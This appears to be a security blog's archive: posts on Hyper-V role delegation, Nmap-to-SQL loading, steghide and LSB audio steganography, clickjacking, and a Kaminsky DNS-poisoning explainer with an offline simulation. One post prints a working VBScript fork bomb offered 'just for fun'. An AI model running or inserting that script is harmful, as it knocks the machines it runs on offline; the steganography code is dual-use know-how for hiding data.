Archive for the ‘Security’ Category

Delegating management in Hyper-V

Separation of duties is a concept we keep coming back to: no one individual (or group) should have full authority over an entire process. It goes hand in hand with least privilege: each individual (or group) should hold just enough system privilege to complete their portion of the process, and no more. In server virtualization, that means dividing duties between those who manage the hypervisor, those who manage the VMs, and those who manage the guest operating systems.

In Hyper-V, you can delegate permission to manage or monitor the VMs separately from managing the hypervisor. Hyper-V reads its authorization policy from the Authorization Manager store at \ProgramData\Microsoft\Windows\Hyper-V\InitialStore.xml, which you edit with the Authorization Manager console (AzMan.msc). Create a Windows security group first, then in AzMan.msc open the store, create a role definition, add to it only the tasks or operations that role needs (for a monitoring role, the read and view operations and nothing that starts, stops or reconfigures a VM), create a role assignment from it, and add the security group as a member. Two caveats: the default Administrator role in the store is held by BUILTIN\Administrators, so anyone who is a local administrator on the host can still do everything regardless of what you delegate; and this AzMan-based model applies to Hyper-V on Windows Server 2008 and 2008 R2, later versions dropped it in favor of the local Hyper-V Administrators group and System Center Virtual Machine Manager.

For step-by-step instructions, please see Microsoft’s documentation.

 

Configure Hyper-V for Role-based Access Control

http://technet.microsoft.com/en-us/library/dd283076(WS.10).aspx
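After delegating, the check worth running is to resolve what each role in the store actually grants and to whom. The script below is an added example, not Microsoft's code and not part of the original post: it walks an AzMan XML store (pass the path to InitialStore.xml as its argument), follows the role to task to operation links, and lists every SID holding each role, so an over-broad delegation shows up before an auditor finds it. The embedded sample store is constructed to follow the AzMan element layout; its GUIDs, operation names and operation IDs are placeholders rather than values copied from a real Hyper-V store.

```python
"""Resolve each role in an AzMan XML store (e.g. Hyper-V's InitialStore.xml)
to the operations it grants and the SIDs that hold it.  Added example, not
Microsoft's code; the sample store is constructed to mirror the AzMan layout
and its GUIDs, operation names and IDs are placeholders."""
import sys
import xml.etree.ElementTree as ET
from typing import Dict, List, Set

Audit = Dict[str, Dict[str, List[str]]]

SAMPLE_STORE = """<AzAdminManager MajorVersion="1" MinorVersion="0" Guid="00000000-0000-0000-0000-000000000001">
  <AzApplication Guid="app-1" Name="Hyper-V services" Description="constructed sample, not the shipped store">
    <AzOperation Guid="op-1" Name="Read Service Configuration"><OperationID>100</OperationID></AzOperation>
    <AzOperation Guid="op-2" Name="Reconfigure Service"><OperationID>105</OperationID></AzOperation>
    <AzOperation Guid="op-3" Name="Read Virtual Machine Configuration"><OperationID>200</OperationID></AzOperation>
    <AzOperation Guid="op-4" Name="Start Virtual Machine"><OperationID>300</OperationID></AzOperation>
    <AzTask Guid="task-1" Name="Monitor Virtual Machines">
      <OperationLink>op-1</OperationLink>
      <OperationLink>op-3</OperationLink>
    </AzTask>
    <AzTask Guid="task-2" Name="Operate Virtual Machines">
      <TaskLink>task-1</TaskLink>
      <OperationLink>op-4</OperationLink>
    </AzTask>
    <AzRole Guid="role-1" Name="Administrator">
      <OperationLink>op-1</OperationLink><OperationLink>op-2</OperationLink>
      <OperationLink>op-3</OperationLink><OperationLink>op-4</OperationLink>
      <Member>S-1-5-32-544</Member>
    </AzRole>
    <AzRole Guid="role-2" Name="VM Operators">
      <TaskLink>task-2</TaskLink>
      <Member>S-1-5-21-1111111111-2222222222-3333333333-1105</Member>
    </AzRole>
  </AzApplication>
</AzAdminManager>
"""


def audit_store(xml_text: str) -> Audit:
    """Return {role name: {"members": [SIDs], "operations": [operation names]}}."""
    root = ET.fromstring(xml_text)
    result: Audit = {}
    for app in root.iter("AzApplication"):
        # iter() rather than findall() also picks up tasks/roles nested in an AzScope.
        ops = {o.get("Guid"): o.get("Name") for o in app.iter("AzOperation")}
        tasks = {t.get("Guid"): t for t in app.iter("AzTask")}

        def expand(elem: ET.Element, seen: Set[str]) -> Set[str]:
            # A role or task grants its own OperationLinks plus everything reachable
            # through TaskLinks; `seen` stops a cycle in a hand-edited store.
            names = {ops[l.text.strip()] for l in elem.findall("OperationLink")
                     if l.text and l.text.strip() in ops}
            for link in elem.findall("TaskLink"):
                guid = (link.text or "").strip()
                if guid in tasks and guid not in seen:
                    seen.add(guid)
                    names |= expand(tasks[guid], seen)
            return names

        for role in app.iter("AzRole"):
            members = [m.text.strip() for m in role.findall("Member") if m.text]
            result[role.get("Name")] = {"members": members,
                                        "operations": sorted(expand(role, set()))}
    return result


def who_can(audit: Audit, operation: str) -> List[str]:
    """SIDs holding at least one role that grants `operation`."""
    return sorted({m for r in audit.values()
                   if operation in r["operations"] for m in r["members"]})


if __name__ == "__main__":
    # With a path argument the real store is audited; otherwise the constructed sample.
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_STORE
    audit = audit_store(text)
    for name, info in audit.items():
        print(f"{name}: members={info['members']}")
        for op in info["operations"]:
            print(f"    {op}")
    print("Can reconfigure the service:", who_can(audit, "Reconfigure Service"))
```

Run it against the real store after every change and keep the output with the change record; the interesting lines are the members that can reach the reconfigure, create and start operations, not the roles you meant to create.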

 

Fun Stuff — Wireshark, L0phtcrack, Netcat

Wireshark was updated last month. “Updated Protocol Support: AFS, ATM, DHCPv6, DIS, E.212, RTP, UDP, USB, WCCP, WPS.” This is excellent as I have been playing around with IPv6 more, and the DHCPv6 and UDP enhancements will be a big help. They also fixed the multi-monitor issue that has been plaguing my setup. I am now running on the latest.

http://www.wireshark.org/news/20090206.html

L0phtCrack is making a comeback. “More than two years after Symantec pulled the plug on L0phtCrack, the venerable password cracking tool is being prepped for a return to the spotlight. The original creators of L0phtCrack has reacquired the tool with plans to release a new version at next week’s SOURCE Boston conference.”

http://blogs.zdnet.com/security/?p=2737

There are also rumors that the L0phtCrack folks, Peiter “Mudge” Zatko and Chris “Weld Pond” Wysopal, are working on a 64-bit release of Netcat. While it is debatable whether 32-bit and 64-bit versions will bring any performance boost in connectivity and cryptography, it does get me one step closer to my goal of running only 64-bit code on my notebook.

http://netcat.sourceforge.net/

It is a very exciting week.

Security is Design

Welcome to 2009, and welcome back to my blog. This year’s focus is on using network architecture to create information security.

I come to this after reading some reports from Gartner Group: Three Lenses Into Information Security; Classifying and Prioritizing Software Vulnerabilities; and Aligning Security Architecture and Enterprise Architecture: Best Practices.

The first report posits that designing, or architecting, security is one of three lenses through which to view InfoSec (the other two being process-focused and control-focused). Why the emphasis on architecture? The primary reason is that most exploitable weaknesses are not in the software itself but in how it is deployed and configured.

“Gartner estimates that, today, 75% of successful attacks exploit configuration mistakes.” Furthermore, few of us have the skills, time, and license to modify the software to address the remaining 25% of the vulnerabilities. Thus the largest positive impact an InfoSec professional can have on security is through planning and architecting the system design.

The secondary reason is that retrofitting security onto an existing system architecture is time-consuming and disruptive to the service. It often requires stopping work while the change is implemented, and it may require reworking the implementation afterwards. That has a tangible cost. Gartner puts it thus: “The careful application of security architecture principles will ensure the optimum level of protection at the minimum cost.”

The bottom line is that emphasizing security architecture in the original design minimizes costs and vulnerabilities.

Nmap output to XML and SQL

The Nmap port scanner has a handful of output options. Normal output (-oN) is the human-readable format you see on screen. If you want to process the data, use XML output (-oX) or grepable output (-oG); -oA writes all three formats at once.

Why export to XML or grepable text? Typically, because you want to audit several IP hosts and store the results in a database.

A quicker method than writing your own parser is the Nmap::Parser Perl module by Anthony Persaud. His Nmap-Parser automates reading the XML output and writing it to SQL tables. MySQL and SQLite are both supported. Nmap-Parser is now up to version 1.19.

Use case: nightly IP scans of a subnet along with TCP scans of select hosts, as part of a security information management process.
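As an added example (not part of the original post, and not Nmap::Parser), here is the same idea in Python for the nightly-scan use case: load each night's -oX file into SQLite, then ask the database which ports are open tonight that were not open last night. The two scan documents are constructed in nmap's XML layout (nmaprun, host, status, address, hostnames, ports, port, state, service) with invented hosts and services.

```python
"""Load nmap -oX output into SQLite and report newly opened ports between two
scans.  Added example, not Nmap::Parser; the two scan documents below are
constructed in nmap's XML layout with invented hosts and services."""
import sqlite3
import xml.etree.ElementTree as ET
from typing import List, Tuple

SCAN_NIGHT1 = """<nmaprun scanner="nmap" args="nmap -sS -oX - 10.0.0.0/29" start="1230768000" version="4.76">
<host><status state="up" reason="arp-response"/><address addr="10.0.0.5" addrtype="ipv4"/>
<hostnames><hostname name="web01.example.test" type="PTR"/></hostnames><ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH" version="5.1p1"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="Apache httpd"/></port>
<port protocol="tcp" portid="3389"><state state="closed" reason="reset"/><service name="ms-term-serv"/></port>
</ports></host>
<host><status state="down" reason="no-response"/><address addr="10.0.0.6" addrtype="ipv4"/></host>
</nmaprun>"""

SCAN_NIGHT2 = """<nmaprun scanner="nmap" args="nmap -sS -oX - 10.0.0.0/29" start="1230854400" version="4.76">
<host><status state="up" reason="arp-response"/><address addr="10.0.0.5" addrtype="ipv4"/>
<hostnames><hostname name="web01.example.test" type="PTR"/></hostnames><ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH" version="5.1p1"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="Apache httpd"/></port>
<port protocol="tcp" portid="3389"><state state="open" reason="syn-ack"/><service name="ms-term-serv"/></port>
</ports></host>
<host><status state="up" reason="arp-response"/><address addr="10.0.0.6" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/><service name="microsoft-ds"/></port>
</ports></host>
</nmaprun>"""

SCHEMA = """
CREATE TABLE IF NOT EXISTS scans (id INTEGER PRIMARY KEY, label TEXT UNIQUE, args TEXT, started INTEGER);
CREATE TABLE IF NOT EXISTS hosts (id INTEGER PRIMARY KEY, scan_id INTEGER REFERENCES scans(id),
                                  addr TEXT, hostname TEXT, state TEXT);
CREATE TABLE IF NOT EXISTS ports (host_id INTEGER REFERENCES hosts(id), proto TEXT, portid INTEGER,
                                  state TEXT, service TEXT, product TEXT, version TEXT);
"""

# Open ports in the current scan with no open counterpart (same address, proto, port) in the previous one.
NEW_OPEN_SQL = """
SELECT h.addr, p.proto, p.portid, p.service
FROM ports p JOIN hosts h ON h.id = p.host_id JOIN scans s ON s.id = h.scan_id
WHERE s.label = :cur AND p.state = 'open'
  AND NOT EXISTS (SELECT 1 FROM ports p0 JOIN hosts h0 ON h0.id = p0.host_id
                  JOIN scans s0 ON s0.id = h0.scan_id
                  WHERE s0.label = :prev AND h0.addr = h.addr AND p0.proto = p.proto
                    AND p0.portid = p.portid AND p0.state = 'open')
ORDER BY h.addr, p.proto, p.portid
"""


def open_db(path: str = ":memory:") -> sqlite3.Connection:
    conn = sqlite3.connect(path)
    conn.executescript(SCHEMA)
    return conn


def load_scan(conn: sqlite3.Connection, xml_text: str, label: str) -> int:
    """Insert one nmap XML document under `label`; returns the number of hosts stored."""
    root = ET.fromstring(xml_text)
    cur = conn.cursor()
    cur.execute("INSERT INTO scans (label, args, started) VALUES (?, ?, ?)",
                (label, root.get("args"), int(root.get("start", "0"))))
    scan_id, hosts = cur.lastrowid, 0
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:                       # IPv6-only or MAC-only entry
            addr = host.find("address")
        if addr is None:
            continue
        name, status = host.find("hostnames/hostname"), host.find("status")
        cur.execute("INSERT INTO hosts (scan_id, addr, hostname, state) VALUES (?, ?, ?, ?)",
                    (scan_id, addr.get("addr"), None if name is None else name.get("name"),
                     None if status is None else status.get("state")))
        host_id, hosts = cur.lastrowid, hosts + 1
        for port in host.iter("port"):
            st, svc = port.find("state"), port.find("service")
            svc_attrs = {} if svc is None else svc.attrib
            cur.execute("INSERT INTO ports VALUES (?, ?, ?, ?, ?, ?, ?)",
                        (host_id, port.get("protocol"), int(port.get("portid")),
                         None if st is None else st.get("state"),
                         svc_attrs.get("name"), svc_attrs.get("product"), svc_attrs.get("version")))
    conn.commit()
    return hosts


def new_open_ports(conn: sqlite3.Connection, prev_label: str, cur_label: str) -> List[Tuple[str, str, int, str]]:
    return conn.execute(NEW_OPEN_SQL, {"prev": prev_label, "cur": cur_label}).fetchall()


def demo() -> List[Tuple[str, str, int, str]]:
    """Load both constructed scans into an in-memory database and return the delta."""
    conn = open_db()
    load_scan(conn, SCAN_NIGHT1, "night1")
    load_scan(conn, SCAN_NIGHT2, "night2")
    return new_open_ports(conn, "night1", "night2")


if __name__ == "__main__":
    for addr, proto, portid, service in demo():
        print(f"NEW: {addr} {proto}/{portid} ({service})")
```

Point `open_db()` at a file instead of ":memory:" and feed it each night's XML with the date as the label; the delta query is the part worth alerting on, since a port that was closed yesterday and is open today is either a change request or an incident.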

Tip: Cygwin for Steganography in Sounds (.wav)

Cygwin can be used for hiding data in sound files.

First, run the Cygwin setup program and select the “steghide: A steganography hiding tool” package under the Security category. You may also be prompted to install libjpeg7 and mhash. Complete the installation.

Second, copy the file to hide and the cover file into your Cygwin home folder (C:\cygwin\home\Administrator for the Administrator account). For example, suppose we use “hidden.msg” and “applause.wav” to embed a text message inside a recording of people clapping, with the word “secret” as the passphrase.

$ steghide --embed --embedfile hidden.msg --coverfile applause.wav --passphrase secret --stegofile output.wav

embedding “hidden.msg” in “applause.wav”… done
writing stego file “output.wav”… done

The resulting “output.wav” file now contains the message. To extract, we use steghide with the passphrase.

$ steghide --extract --stegofile output.wav --passphrase secret --extractfile output.msg

wrote extracted data to “output.msg”.

That is how to use steghide in Cygwin to embed and extract files from sound files (.wav). Two cautions: a passphrase given with --passphrase ends up in your shell history and is visible to anyone listing processes while steghide runs, so in practice omit it and let steghide prompt; and pick a real passphrase rather than “secret”, because steghide encrypts the payload with it by default and that encryption is the only thing protecting the message from anyone who suspects the file carries one.
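To see what is happening underneath, here is a simplified least-significant-bit embedder for 16-bit WAV files, added as an example; it is not steghide's code or algorithm. steghide chooses sample positions with a graph-theoretic matching and encrypts the payload with the passphrase, whereas this version only uses the passphrase to seed the order in which samples are overwritten and provides no confidentiality on its own. The cover file is synthesized in memory (a 440 Hz tone), so the script runs with no input files.

```python
"""Least-significant-bit steganography in 16-bit PCM WAV.  Added example,
not steghide's code: the passphrase only seeds the sample order, the payload
is not encrypted, and the cover is a synthesized tone."""
import array
import hashlib
import io
import math
import random
import struct
import wave


def make_cover_wav(seconds: float = 1.0, rate: int = 8000) -> bytes:
    """Constructed cover: mono, 16-bit, `seconds` of a 440 Hz sine."""
    n = int(seconds * rate)
    samples = array.array("h", (int(12000 * math.sin(2 * math.pi * 440 * i / rate)) for i in range(n)))
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(samples.tobytes())
    return buf.getvalue()


def _samples(wav_bytes: bytes):
    with wave.open(io.BytesIO(wav_bytes), "rb") as w:
        if w.getsampwidth() != 2:
            raise ValueError("only 16-bit PCM is handled here")
        params = w.getparams()
        samples = array.array("h")
        samples.frombytes(w.readframes(w.getnframes()))
    return params, samples


def _positions(passphrase: str, count: int) -> list:
    # The passphrase decides which sample carries which bit; with the wrong
    # passphrase the LSBs are read in the wrong order and come out as noise.
    seed = int.from_bytes(hashlib.sha256(passphrase.encode()).digest(), "big")
    order = list(range(count))
    random.Random(seed).shuffle(order)
    return order


def embed(cover: bytes, payload: bytes, passphrase: str) -> bytes:
    """Hide `payload` in the LSBs of the cover's samples; one bit per sample."""
    params, samples = _samples(cover)
    data = struct.pack(">I", len(payload)) + payload      # 4-byte length header, then payload
    bits = [(byte >> (7 - k)) & 1 for byte in data for k in range(8)]
    if len(bits) > len(samples):
        raise ValueError(f"cover holds {len(samples) // 8} bytes, payload needs {len(data)}")
    order = _positions(passphrase, len(samples))
    for bit, idx in zip(bits, order):
        samples[idx] = (samples[idx] & ~1) | bit           # touch only the least significant bit
    out = io.BytesIO()
    with wave.open(out, "wb") as w:
        w.setparams(params)
        w.writeframes(samples.tobytes())
    return out.getvalue()


def extract(stego: bytes, passphrase: str) -> bytes:
    """Recover the payload; raises ValueError when the passphrase does not fit the file."""
    _, samples = _samples(stego)
    order = _positions(passphrase, len(samples))

    def read(bit_offset: int, nbytes: int) -> bytes:
        out = bytearray()
        for i in range(nbytes):
            value = 0
            for k in range(8):
                value = (value << 1) | (samples[order[bit_offset + i * 8 + k]] & 1)
            out.append(value)
        return bytes(out)

    length = struct.unpack(">I", read(0, 4))[0]
    if 32 + length * 8 > len(samples):
        raise ValueError("no payload found (wrong passphrase, or the file never carried one)")
    return read(32, length)


if __name__ == "__main__":
    cover = make_cover_wav()
    stego = embed(cover, b"meet at the usual place", "secret")
    print(extract(stego, "secret"))
```

The stego file is byte-for-byte the same size as the cover and plays identically; the only change is the lowest bit of some samples, which is also why an uncompressed format like .wav is used. Convert it to MP3 and the payload is gone.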

Clickjacking Revealed

The “Clickjacking” attack bothers me because it seems so obvious. Well, obvious to someone who has done JavaScript web development.

Years ago, I worked on a web user interface (wui) where we tried to duplicate all the functionality of a gui using JavaScript and XML. This was Ajax before it was called Ajax. I had a demo that basically was a clickjack attack whose intent was to annoy the user or to trigger an event. A prank or a feature, it was trivial to implement with a few lines of code.

Thus the attack is another case of media hype. Giving this attack a clever name like “Clickjacking” seems to be like calling a person who unplugs your network cable a “Cablejacker”.

 

J Wolfgang Goerlich

(Incidentally, in case anyone is interested, my employer attempted to patent the wui idea. The details are online.)
http://www.freepatentsonline.com/y2003/0088640.html?query=Goerlich&stemming=on

VBScript Fork Bomb

I have been playing around with VBScript. I thought I would make a quick fork bomb, just for fun. “The fork bomb, a form of denial-of-service attack against a computer system, implements the fork operation (or equivalent functionality) whereby a running process can create another running process.” (Wikipedia)

' Each copy launches another copy of itself and then loops to launch more, so the
' number of wscript.exe processes grows until the machine runs out of resources.
' ScriptFullName is used so the relaunch does not depend on the current directory.
Do Until True = False
    CreateObject("WScript.Shell").Run WScript.ScriptFullName
Loop

London Stock Exchange – When Good Systems Go Bad

“The London Stock Exchange suffered its worst systems failure in eight years on Monday, forcing the world’s third largest share market to suspend trading for about seven hours and infuriating its users. (…) Monday’s trading suspension was the longest suffered by the exchange since April 5, 2000, when problems with an older trading system led to an eight-hour suspension.”

London Stock Exchange crippled by system outage
http://www.reuters.com/article/ousiv/idUSL01084620080908

The Exchange uses TradElect, a Microsoft .NET application that runs on Windows and SQL Server. What surprises me is that they did not elect to go into DR. From an earlier press release, the TradElect “platform has been designed to the highest levels of resilience with comprehensive back up, which includes dual processing at two sites and recovery from component failure within a second.”

DNS Cache Pollution

Much news is being made of the DNS flaw identified by Dan Kaminsky. McAfee Avert Labs Blog has the most succinct description of the problem.

The vulnerability comes from how little a resolver checks before accepting an answer. Queries go out over UDP, and a reply is accepted if its 16-bit transaction ID and its destination port match an outstanding query; older resolvers sent every query from the same source port, so the transaction ID was the only thing an attacker had to guess. An attacker who can make the resolver look up a name floods it with forged replies, and if one of them matches before the real answer arrives, the resolver caches the forgery and www.mybank.com becomes the attacker’s IP address in its cache. Kaminsky’s contribution was showing that the attacker need not wait for a cached record to expire: by asking for random names under the target domain, each of which is a fresh lookup, and placing the poisoned www.mybank.com record in the authority or additional section of the forged reply, the race can be rerun thousands of times a second until it is won. The resolver then answers client requests for www.mybank.com with the forged information until that record’s TTL runs out. The coordinated patch randomizes the source port, which multiplies the attacker’s guess space by roughly 65,000.

This is a concern because the attacker’s site, if properly duplicated, looks exactly like the real one to the end user. What happens next is largely up to what the attacker intends to do. The most common follow-up would be a phishing attack, in which the site simply gathers people’s banking credentials. Bruce Schneier wrote a recent Wired article on this flaw. Schneier makes an excellent point. “Stop assuming that systems are secure unless demonstrated insecure; start assuming that systems are insecure unless designed securely.”

 

Related Links:

Dan Kaminsky: DNS Checker
http://www.doxpara.com/?page_id=1159

Lesson From the DNS Bug: Patching Isn’t Enough by Bruce Schneier
http://www.wired.com/politics/security/commentary/securitymatters/2008/07/securitymatters_0723
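A small model of the race, added as an example and not taken from the original post, from Kaminsky’s tool or from any real resolver: a resolver that accepts a reply on transaction ID and port and applies a bailiwick check to glue, an attacker who triggers lookups of random names under mybank.com and floods forged replies carrying www.mybank.com in the additional section, and the same attack run against a resolver with source-port randomization. Names, addresses, seeds and packet counts are constructed for the sample.

```python
"""Toy model of the Kaminsky DNS cache-poisoning race.  Added example, not a
real resolver: one UDP query is outstanding at a time, a reply is accepted on
(transaction ID, port, name), and glue is cached only inside the queried zone."""
import random
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple


@dataclass
class Response:
    txid: int
    dport: int                                                # port the reply is addressed to
    qname: str
    answers: Dict[str, str] = field(default_factory=dict)     # name -> address
    additional: Dict[str, str] = field(default_factory=dict)  # glue: name -> address


class Resolver:
    FIXED_PORT = 53   # pre-patch resolvers reused one source port; an attacker learns it by
                      # having the resolver query a nameserver the attacker runs

    def __init__(self, randomize_port: bool, seed: Optional[int] = None):
        self.rng = random.Random(seed)
        self.randomize_port = randomize_port
        self.cache: Dict[str, str] = {}
        self.pending: Optional[Tuple[int, int, str]] = None

    def query(self, qname: str) -> Tuple[int, int]:
        txid = self.rng.getrandbits(16)
        sport = self.rng.randint(1024, 65535) if self.randomize_port else self.FIXED_PORT
        self.pending = (txid, sport, qname)
        return txid, sport

    def receive(self, r: Response) -> bool:
        """Accept the first reply that matches the outstanding query; drop anything else."""
        if self.pending is None or (r.txid, r.dport, r.qname) != self.pending:
            return False
        self.pending = None
        zone = r.qname.split(".", 1)[1]
        self.cache.update({n: a for n, a in r.answers.items() if n == r.qname})
        # Bailiwick rule: additional records are cached only for names under the queried zone.
        self.cache.update({n: a for n, a in r.additional.items() if n.endswith("." + zone)})
        return True


def poison_probability(entropy_bits: int, forged_packets: int) -> float:
    """Chance that at least one of `forged_packets` blind guesses matches one query."""
    return 1 - (1 - 2.0 ** -entropy_bits) ** forged_packets


def kaminsky_attack(resolver: Resolver, attacker_seed: int = 0, victim: str = "www.mybank.com",
                    attacker_ip: str = "203.0.113.66", forged_per_round: int = 500,
                    max_rounds: int = 2000) -> Optional[int]:
    """Run the race; return the round in which the cache was poisoned, or None."""
    attacker = random.Random(attacker_seed)
    zone = victim.split(".", 1)[1]
    for rnd in range(1, max_rounds + 1):
        # A random name is never already cached, so every round forces a fresh lookup: no TTL wait.
        qname = f"r{attacker.getrandbits(32)}.{zone}"
        real_txid, real_port = resolver.query(qname)
        for _ in range(forged_per_round):
            port = attacker.randint(1024, 65535) if resolver.randomize_port else Resolver.FIXED_PORT
            # The poison rides in the additional section, inside the bailiwick of the queried zone.
            if resolver.receive(Response(attacker.getrandbits(16), port, qname,
                                         additional={victim: attacker_ip})):
                return rnd
        resolver.receive(Response(real_txid, real_port, qname))   # real NXDOMAIN wins; try again
    return None


if __name__ == "__main__":
    for randomize in (False, True):
        r = Resolver(randomize_port=randomize, seed=1)
        rounds = kaminsky_attack(r, attacker_seed=2)
        print(f"source-port randomization={randomize}: poisoned in round {rounds}, "
              f"www.mybank.com -> {r.cache.get('www.mybank.com')}")
    print("per-round success, 16 bits vs ~32 bits:",
          poison_probability(16, 500), poison_probability(32, 500))
```

With a fixed port the attack lands within a few hundred rounds, which on a real network is seconds; with the port randomized the same budget of forged packets gets nowhere, which is the whole content of the patch. The bailiwick check is what keeps a reply for a name under mybank.com from planting a record for some other zone.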

Would you hire an ethical hacker?

Hackers are not some ominous bad guys. For many years, I have been trying to explain this to family and friends, my staff, my colleagues and auditors. I use words like “criminal” or “attacker” in my memos and emails. Hackers have long been given a bad rap.

That rap is implicit in the question: would you hire an ethical hacker? Bank robbing and espionage may be crimes, but hacking? Linking the word ethical to hacking gives us an opportunity to highlight the difference between a talented unconventional IT wiz and someone practicing digital breaking-and-entering.